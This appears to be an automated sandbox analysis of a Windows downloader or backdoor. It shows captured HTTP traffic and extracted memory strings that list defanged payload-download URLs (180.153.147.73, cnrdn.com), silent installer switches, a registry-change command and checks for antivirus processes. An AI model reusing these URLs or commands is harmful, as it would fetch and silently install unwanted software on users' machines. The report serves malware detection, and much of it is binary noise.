Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Tue, 13 Oct 2015 22:41:22 GMT
Server: PWS/8.1.20.22
X-Px: ms h0-s1174.p11-fra ( h0-s1100.p11-fra), ht-d h0-s1100.p11-fra.cdngp.net
ETag: "5615c712-23fe"
Cache-Control: max-age=600
Expires: Tue, 13 Oct 2015 22:44:15 GMT
Age: 427
Content-Length: 3572
Content-Type: application/x-javascript
Content-Encoding: gzip
Vary: Accept-Encoding
Px-Uncompress-Origin: 9214
Last-Modified: Thu, 08 Oct 2015 01:29:54 GMT
Connection: keep-alive
...........Y.S.H.. .l....,.@vm..$.PGB68{[....4...$.......y....nST..i.L
?....<......K......$ly...x.Y.........{..~i9..>\.<......c>.
......z...D... .,q...e....m.._....1...m.t....._...M....$.9Q.x.....!O].
s.../.u......rm.a....qF..t.eq:.. .. .......v............Y..8..{.....[.
O3...9..F.n.....Z. >..yzNX...d..qv.....6qhaM7.,..... .{..8V.R.F!0.f
...n}/[Rb.w%m...2S.b.'..-..C....<p..4.i.Yg...(!.h.'....1)%.".R..`..
.3s.;b..x~......LtE.kW...i.L..l.f.....<.g...$;....n..[v...m....m.Io
}.v........t..Y...W.3.j.[Fy....1'..%d.!...I?..k4.F.aN.._f....... .....
....../tX%............J.t:..".6.....r...nW..?......%..b......<J....
..........v..{i8.....B.*{A.<.......Ya..Ol.....&......S.zr....I.\#(.
.a.....'.F.EU.P"E.p{6.d......._..... .Z..|W.....f. ........!.. .4..G.v
...p. I..2v....9.XK"...a1.....,..y..8/..#"..,$......#.2TS.p7.e~..2..B.
.Y....A.H..=...s." ...........[i...~.0.t...`....>1....k.ta...SB..a.
.Hv!0....LW..%.....@JD|^R.j`>.Q..a..2..k.'.w)...3...9...].../.o.U..
....*..z...o.(b.B`ej.,.8...(.:b.1K.*..5'......!.....j..V..R......Wq...
'.XM....?j.P.......XI.gAN...sr}m....H.|.S.......(..HO...J..B]........-
..O.F...........Q.F.q......E=..A..|..G.v(...yX,..YV.m..\ok."\HKv.(....
.....-.H.........'.#.. (........"s../ph>......s=s...P.I.2_.x.[.....
.nN...(W..g.....iV....NsqS......q[.u...Vr.!....&..'Q.a..X'U......qq...
..k....."qu..F..6Eu.u....qP....rvvzp..&.G.....,...!.....(..H..../...X.
.}...S.....I.#..%-..,.I0/.!....h........J.Fq.<...DW.Z.c..'..M.T.R.T
Y.n.2... .2I..4cY.B...).(>.HW.p.Lb.ye........?.!....Q.R...*y./.
<<< skipped >>>


GET /ktv/9158chat2_ktv097_28140141.exe HTTP/1.1
Host:jh.01lm.com
Accept:*/*
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Connection:Keep-Alive
Range: bytes=5426060-6782574


HTTP/1.0 206 Partial Content
Date: Tue, 13 Oct 2015 22:41:22 GMT
Content-Type: application/octet-stream
ETag: "-501244861"
Accept-Ranges: bytes
Last-Modified: Mon, 24 Aug 2015 03:34:09 GMT
Server: WS CDN Server
Content-Range: bytes 5426060-6782574/10852120
Content-Length: 1356515
Age: 1
Via: 1.0 lsh66:8104 (Cdn Cache Server V2.0), 1.0 jsly59:8080 (Cdn Cache Server V2.0), 1.0 nn11:8101 (Cdn Cache Server V2.0)
Connection: keep-alive
HTTP/1.0 206 Partial Content..Date: Tue, 13 Oct 2015 22:41:22 GMT..Con
tent-Type: application/octet-stream..ETag: "-501244861"..Accept-Ranges
: bytes..Last-Modified: Mon, 24 Aug 2015 03:34:09 GMT..Server: WS CDN 
Server..Content-Range: bytes 5426060-6782574/10852120..Content-Length:
 1356515..Age: 1..Via: 1.0 lsh66:8104 (Cdn Cache Server V2.0), 1.0 jsl
y59:8080 (Cdn Cache Server V2.0), 1.0 nn11:8101 (Cdn Cache Server V2.0
)..Connection: keep-alive..,>=....#\.o....d.W.{.fdy.....f.}RtW.../]
.45?lf.81......0...c....lE^DH.U.........Y....."...........G.6..f."q...
(. i.?.).3.vO&TB..kymk...'1.5!......#fp.u......1.w..5.....47..[.W..2q.
..{B..4#R....Y.>:%~.......;......~9Tb......M...B....[..n...*."^j...
E..>.W.d..b...q.Zz..g....r.9>.%T.v.C..'.9^.f{.....lw...o.7?O.1w.
..`.....M.(.{..m..<|mC!..j..?........(hv.0.T<i..s.5/}.I?...'..yt
.\a.7;)Q..Y....s.A.....5........{...g.Vc......g..I.1..F...c.........xH
........}..OA.....*q.2I.b]..d...x2Y.!....j.Fuy1....;......u...I...[~..
......<..=.U.J./.hgK...O7...a@v\..y.>b....7..y....z..~q ..9C.H~.
).."E]....x./.......\.;[email protected]...#r;.%.l..J.....5..G.i#).S..I.
[email protected].....]f.Ni.....9.....>g...X..zO.3./.M.......YCR......
....G~f..6.R7SJ...'.(..fq.5]=>.{..y......*.mC.r7....T.%[email protected].
.k..Vs...W....6*...h.W..k?...N../..<..d.N.QX...:...V.C..{h=..qv{C..
...z.X...Z.pJuR......y .....A....W...F...21......f\.*dF....`M.Yw....;V
....Nn.;.n..r.\.D..R.Y.rM..O.Im. . ...fs........:..I..(k...3Vvo.H...-.
|U9[....H_....P`..[.....`.-../V.@.!.!....?.....aE"....P.51j.# G/.k
<<< skipped >>>

The Backdoor connects to the servers at the folowing location(s):

%original file name%.exe_1832:

`.rsrc
t$(SSh
~%UVW
.tTPV
FTPjK
FtPj;
F.PjRWj
u.WWj
u.VVj
u$SShe
user32.dll
urlmon
ole32.dll
shell32.dll
RegOpenKeyA
RegEnumKeyA
MsgWaitForMultipleObjects
URLDownloadToFileA
D:\dream
D:\dream\win1.log
QQPCTray.exe
D:\dream\winky.log
360tray.exe
D:\dream\win2.log
D:\dream\winzmbd.log
C:\Users\Public\Desktop\UC
%Documents and Settings%\All Users\
Software\Microsoft\Windows\CurrentVersion\Uninstall
Software\Microsoft\Windows\CurrentVersion\Uninstall\
Windows
C:\Users\Public\Desktop\2345
C:\Users\Public\Desktop\
D:\dream\b2.bat
D:\dream\2k
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2k?public&code=bc96045fad7c5e598098b4c38960a58f
D:\dream\2345pic_k1252705.exe
D:\dream\2345pic_k1252705.exe -s1
2345pic_k1252705.exe
C:\Users\
%Documents and Settings%\
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_USERS\S-1-5-21-4278381565-3782908184-2563460023-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_USERS\S-1-5-21-442436397-1971995177-210813084-500\Software\Microsoft\Windows\CurrentVersion\Uninstall
D:\dream\1.bat
hXXp://cnrdn.com/rd.htm?id=1434474&r=http://VVV.baidu.com/
WinHttp.WinHttpRequest.5.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
D:\dream\ky
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/jm/1/ky?public&code=618009ec0030ff56d26737fbb6a007aa
D:\dream\Kuaizip_Setup_7654_1061607.exe
D:\dream\Kuaizip_Setup_7654_1061607.exe /JingMo
hXXp://cnrdn.com/rd.htm?id=1486675&r=http://VVV.baidu.com/
D:\dream\b.bat
D:\dream\2b1
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b1?public&code=afee9a3d69bbe1feef1f6dc8cfde1cbf
D:\dream\2b2
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b2?public&code=02bb6661abd99ff72259707a9b53c750
D:\dream\2b3
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b3?public&code=8ce18dbc7b1a421fa4d0ffe8392ee432
D:\dream\2b4
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b4?public&code=b3a42642be7f0a15054e0695b2b9447f
D:\dream\2b5
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b5?public&code=c9e36403780d6acd5f66e1bc35d1838d
D:\dream\2345explorer_k1252705.exe
D:\dream\2345explorer_k1252705.exe -s1
2345explorer_k1252705.exe
hXXp://cnrdn.com/rd.htm?id=1438531&r=http://VVV.baidu.com/
D:\dream\zy
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/zy2/zy?public&code=94979ed818604a3f6632db70c4686078
D:\dream\lgezy
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/3/lge?public&code=84c5751f6a57ab5839dc76a83b46d24d
D:\dream\BlueInstaller_bsvalkkx_101101_.exe
D:\dream\BlueResource.bpk
set "w71=Microsoft\Windows\Start Menu\Programs"
set "w72=Microsoft\Windows\Start Menu"
"%USERPROFILE%\%xp1%"
"%ALLUSERSPROFILE%\%xp1%"
"%USERPROFILE%\%xp2%"
"%ALLUSERSPROFILE%\%xp2%"
reg add "HKEY_CURRENT_USER\Software\HomeSafe" /v "StartFlagNoTip" /t REG_DWORD /d 1 /f
D:\dream\2.bat
hXXp://cnrdn.com/rd.htm?id=1491046&r=http://VVV.baidu.com/
D:\dream\7b1
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b1?public&code=65e1f8bb6a35d835ac36afb3fe114df0
D:\dream\7b2
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b2?public&code=75e1b53f8002b8fcbef1533ddcf838f3
D:\dream\7b3
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b3?public&code=2bb598cb60451c4b4c1930932c14c586
D:\dream\7b4
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b4?public&code=4cdbf863df18a09984db8531c4f8dac0
D:\dream\7b5
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b5?public&code=192609a39126a61929211de82ef70fd6
D:\dream\bdBrowserSetup-5956-ftn_1050103060.exe
hXXp://cnrdn.com/rd.htm?id=1483547&r=http://VVV.baidu.com/
D:\dream\uc1
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc1?public&code=6fdb767dabadc33d2d6d795070210423
D:\dream\uc2
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc2?public&code=fc17f9c282f24d1cb0252ce893cddb8f
D:\dream\uc3
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc3?public&code=950c1793575761983e9f4158bbce1bc5
D:\dream\uc4
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc4?public&code=4521c8d77cc1a0a675996ecf979e172c
D:\dream\uc5
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc5?public&code=7ec7b3ccb21e6f94450c8a28eeed7c0e
D:\dream\uc6
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc6?public&code=d05b6e4a191a5f39789a63a568014257
D:\dream\lgeuc
D:\dream\3.bat
hXXp://cnrdn.com/rd.htm?id=1438530&r=http://VVV.baidu.com/
D:\dream\7GJ1
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7gj1/7gj1?public&code=855660852431bcf426a5bae830564ee1
D:\dream\7GJ2
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7gj1/7gj2?public&code=559f2fd5eae8a65b9c76b7e06baadf9f
D:\dream\7GJ3
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7gj1/7gj3?public&code=90f7aa8c1fe3f4c7fb2afcb21556be79
D:\dream\7GJ4
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7gj1/7gj4?public&code=c707ac8ce76d6128340264348878791d
D:\dream\7GJ5
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7gj1/7gj5?public&code=8be55fde74c8db8826421a15c32e49a3
D:\dream\PCMgr_Setup_10_8_16208_227(123004164).exe
hXXp://cnrdn.com/rd.htm?id=1486784&r=http://VVV.baidu.com/
D:\dream\zmbd
hXXp://dlsw.br.baidu.com/ditui/zujian/Baidu_Setup_1.6.200.359_ftn_1050103060.exe
D:\dream\Baidu_Setup_1.6.200.359_ftn_1050103060.exe
hXXp://cnrdn.com/rd.htm?id=1442397&r=http://VVV.baidu.com/
hXXp://cnrdn.com/rd.htm?id=1489464&r=http://VVV.baidu.com/
hXXp://cnrdn.com/rd.htm?id=1384177&r=http://VVV.baidu.com/
D:\MM-liao9728.exe
D:\MM-liao
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/mm?public&code=412c89b951806641268495a46a262424
hXXp://cnrdn.com/rd.htm?id=1490574&r=http://VVV.baidu.com/
hXXp://cnrdn.com/rd.htm?id=1384659&r=http://VVV.baidu.com/
%Ui,)
tüV
1.2.18
inflate 1.1.3 Copyright 1995-1998 Mark Adler
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
MSWHEEL_ROLLMSG
__MSVCRT_HEAP_SELECT
portuguese-brazilian
iphlpapi.dll
SHLWAPI.dll
MPR.dll
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
(*.avi)|*.avi
WPFT532.CNV
WPFT632.CNV
EXCEL32.CNV
write32.wpc
Windows Write
mswrd632.wpc
Word for Windows 6.0
wword5.cnv
Word for Windows 5.0
mswrd832.cnv
mswrd632.cnv
Word 6.0/95 for Windows & Macintosh
html32.cnv
Service Pack %d
Windows 2003
Windows XP
Windows 2000
Windows NT
Windows ??
Windows Millenium Edition
Windows 98 Second Edition
Windows 98 SP1
Windows 98
Windows 95 OSR2
Windows 95 SP1
Windows 95
Windows CE
Microsoft Windows Me
Microsoft Windows 98
Microsoft Windows 95
Microsoft Windows 2003
Microsoft Windows XP
Microsoft Windows 2000
Microsoft Windows NT
KERNEL32.DLL
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
187b.exe
cmd.exe
d969ebaf167b88f355e5187b.exe
x86 9.0.30729.4148
c:\%original file name%.exe
GetCPInfo
GetWindowsDirectoryA
WinExec
GetProcessHeap
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
GetViewportExtEx
GetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
ShellExecuteA
GetKeyboardLayout
GetKeyState
SetWindowsHookExA
UnhookWindowsHookEx
CreateDialogIndirectParamA
.text
.rdata
@.data
.rsrc
%Cou.NK
WmSGN
g[Key
<assemblyIdentity version="1.0.0.0" name=".add"/>
????????<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
ADVAPI32.dll
AVIFIL32.dll
COMCTL32.dll
comdlg32.dll
GDI32.dll
MSVFW32.dll
OLEAUT32.dll
RASAPI32.dll
SHELL32.dll
USER32.dll
VERSION.dll
WININET.dll
WINMM.dll
WINSPOOL.DRV
WS2_32.dll
(*.*)
5.2.1.0

%original file name%.exe_1832_rwx_00401000_002A7000:

t$(SSh
~%UVW
.tTPV
FTPjK
FtPj;
F.PjRWj
u.WWj
u.VVj
u$SShe
user32.dll
urlmon
ole32.dll
shell32.dll
RegOpenKeyA
RegEnumKeyA
MsgWaitForMultipleObjects
URLDownloadToFileA
D:\dream
D:\dream\win1.log
QQPCTray.exe
D:\dream\winky.log
360tray.exe
D:\dream\win2.log
D:\dream\winzmbd.log
C:\Users\Public\Desktop\UC
%Documents and Settings%\All Users\
Software\Microsoft\Windows\CurrentVersion\Uninstall
Software\Microsoft\Windows\CurrentVersion\Uninstall\
Windows
C:\Users\Public\Desktop\2345
C:\Users\Public\Desktop\
D:\dream\b2.bat
D:\dream\2k
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2k?public&code=bc96045fad7c5e598098b4c38960a58f
D:\dream\2345pic_k1252705.exe
D:\dream\2345pic_k1252705.exe -s1
2345pic_k1252705.exe
C:\Users\
%Documents and Settings%\
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_USERS\S-1-5-21-4278381565-3782908184-2563460023-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_USERS\S-1-5-21-442436397-1971995177-210813084-500\Software\Microsoft\Windows\CurrentVersion\Uninstall
D:\dream\1.bat
hXXp://cnrdn.com/rd.htm?id=1434474&r=http://VVV.baidu.com/
WinHttp.WinHttpRequest.5.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
D:\dream\ky
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/jm/1/ky?public&code=618009ec0030ff56d26737fbb6a007aa
D:\dream\Kuaizip_Setup_7654_1061607.exe
D:\dream\Kuaizip_Setup_7654_1061607.exe /JingMo
hXXp://cnrdn.com/rd.htm?id=1486675&r=http://VVV.baidu.com/
D:\dream\b.bat
D:\dream\2b1
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b1?public&code=afee9a3d69bbe1feef1f6dc8cfde1cbf
D:\dream\2b2
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b2?public&code=02bb6661abd99ff72259707a9b53c750
D:\dream\2b3
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b3?public&code=8ce18dbc7b1a421fa4d0ffe8392ee432
D:\dream\2b4
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b4?public&code=b3a42642be7f0a15054e0695b2b9447f
D:\dream\2b5
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2b2/2b5?public&code=c9e36403780d6acd5f66e1bc35d1838d
D:\dream\2345explorer_k1252705.exe
D:\dream\2345explorer_k1252705.exe -s1
2345explorer_k1252705.exe
hXXp://cnrdn.com/rd.htm?id=1438531&r=http://VVV.baidu.com/
D:\dream\zy
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/zy2/zy?public&code=94979ed818604a3f6632db70c4686078
D:\dream\lgezy
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/3/lge?public&code=84c5751f6a57ab5839dc76a83b46d24d
D:\dream\BlueInstaller_bsvalkkx_101101_.exe
D:\dream\BlueResource.bpk
set "w71=Microsoft\Windows\Start Menu\Programs"
set "w72=Microsoft\Windows\Start Menu"
"%USERPROFILE%\%xp1%"
"%ALLUSERSPROFILE%\%xp1%"
"%USERPROFILE%\%xp2%"
"%ALLUSERSPROFILE%\%xp2%"
reg add "HKEY_CURRENT_USER\Software\HomeSafe" /v "StartFlagNoTip" /t REG_DWORD /d 1 /f
D:\dream\2.bat
hXXp://cnrdn.com/rd.htm?id=1491046&r=http://VVV.baidu.com/
D:\dream\7b1
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b1?public&code=65e1f8bb6a35d835ac36afb3fe114df0
D:\dream\7b2
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b2?public&code=75e1b53f8002b8fcbef1533ddcf838f3
D:\dream\7b3
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b3?public&code=2bb598cb60451c4b4c1930932c14c586
D:\dream\7b4
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b4?public&code=4cdbf863df18a09984db8531c4f8dac0
D:\dream\7b5
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7b/7b5?public&code=192609a39126a61929211de82ef70fd6
D:\dream\bdBrowserSetup-5956-ftn_1050103060.exe
hXXp://cnrdn.com/rd.htm?id=1483547&r=http://VVV.baidu.com/
D:\dream\uc1
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc1?public&code=6fdb767dabadc33d2d6d795070210423
D:\dream\uc2
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc2?public&code=fc17f9c282f24d1cb0252ce893cddb8f
D:\dream\uc3
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc3?public&code=950c1793575761983e9f4158bbce1bc5
D:\dream\uc4
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc4?public&code=4521c8d77cc1a0a675996ecf979e172c
D:\dream\uc5
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc5?public&code=7ec7b3ccb21e6f94450c8a28eeed7c0e
D:\dream\uc6
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/uc2/uc6?public&code=d05b6e4a191a5f39789a63a568014257
D:\dream\lgeuc
D:\dream\3.bat
hXXp://cnrdn.com/rd.htm?id=1438530&r=http://VVV.baidu.com/
D:\dream\7GJ1
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7gj1/7gj1?public&code=855660852431bcf426a5bae830564ee1
D:\dream\7GJ2
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7gj1/7gj2?public&code=559f2fd5eae8a65b9c76b7e06baadf9f
D:\dream\7GJ3
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7gj1/7gj3?public&code=90f7aa8c1fe3f4c7fb2afcb21556be79
D:\dream\7GJ4
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7gj1/7gj4?public&code=c707ac8ce76d6128340264348878791d
D:\dream\7GJ5
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7gj1/7gj5?public&code=8be55fde74c8db8826421a15c32e49a3
D:\dream\PCMgr_Setup_10_8_16208_227(123004164).exe
hXXp://cnrdn.com/rd.htm?id=1486784&r=http://VVV.baidu.com/
D:\dream\zmbd
hXXp://dlsw.br.baidu.com/ditui/zujian/Baidu_Setup_1.6.200.359_ftn_1050103060.exe
D:\dream\Baidu_Setup_1.6.200.359_ftn_1050103060.exe
hXXp://cnrdn.com/rd.htm?id=1442397&r=http://VVV.baidu.com/
hXXp://cnrdn.com/rd.htm?id=1489464&r=http://VVV.baidu.com/
hXXp://cnrdn.com/rd.htm?id=1384177&r=http://VVV.baidu.com/
D:\MM-liao9728.exe
D:\MM-liao
hXXp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/mm?public&code=412c89b951806641268495a46a262424
hXXp://cnrdn.com/rd.htm?id=1490574&r=http://VVV.baidu.com/
hXXp://cnrdn.com/rd.htm?id=1384659&r=http://VVV.baidu.com/
%Ui,)
tüV
1.2.18
inflate 1.1.3 Copyright 1995-1998 Mark Adler
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
MSWHEEL_ROLLMSG
__MSVCRT_HEAP_SELECT
portuguese-brazilian
iphlpapi.dll
SHLWAPI.dll
MPR.dll
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
(*.avi)|*.avi
WPFT532.CNV
WPFT632.CNV
EXCEL32.CNV
write32.wpc
Windows Write
mswrd632.wpc
Word for Windows 6.0
wword5.cnv
Word for Windows 5.0
mswrd832.cnv
mswrd632.cnv
Word 6.0/95 for Windows & Macintosh
html32.cnv
Service Pack %d
Windows 2003
Windows XP
Windows 2000
Windows NT
Windows ??
Windows Millenium Edition
Windows 98 Second Edition
Windows 98 SP1
Windows 98
Windows 95 OSR2
Windows 95 SP1
Windows 95
Windows CE
Microsoft Windows Me
Microsoft Windows 98
Microsoft Windows 95
Microsoft Windows 2003
Microsoft Windows XP
Microsoft Windows 2000
Microsoft Windows NT
KERNEL32.DLL
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
187b.exe
cmd.exe
d969ebaf167b88f355e5187b.exe
x86 9.0.30729.4148
c:\%original file name%.exe
GetCPInfo
GetWindowsDirectoryA
WinExec
GetProcessHeap
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
GetViewportExtEx
GetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
ShellExecuteA
GetKeyboardLayout
GetKeyState
SetWindowsHookExA
UnhookWindowsHookEx
CreateDialogIndirectParamA
.text
.rdata
@.data
.rsrc
(*.*)

svchost.exe_1660:

.text
`.data
.rsrc
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
RPCRT4.dll
NETAPI32.dll
ole32.dll
ntdll.dll
RegCloseKey
RegOpenKeyExW
GetProcessHeap
NtOpenKey
svchost.pdb
\PIPE\
Software\Microsoft\Windows NT\CurrentVersion\Svchost
\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
5.1.2600.5512 (xpsp.080413-2111)
svchost.exe
Windows
Operating System
5.1.2600.5512

MM-liao9728.exe_1888:

.text
`.rdata
@.data
.rsrc
SSSSh
FtPh
tGHt.Ht&
OnBeforeNavigation: URL="%s", frame="%s", post_data=[0xX,%d bytes], headers="%s"
OnDocumentComplete: URL="%s"
OnProgressChange: progress=%d, progress_max=%d
OnNavigationComplete2: URL="%s"
OnStatusTextChange: text="%s"
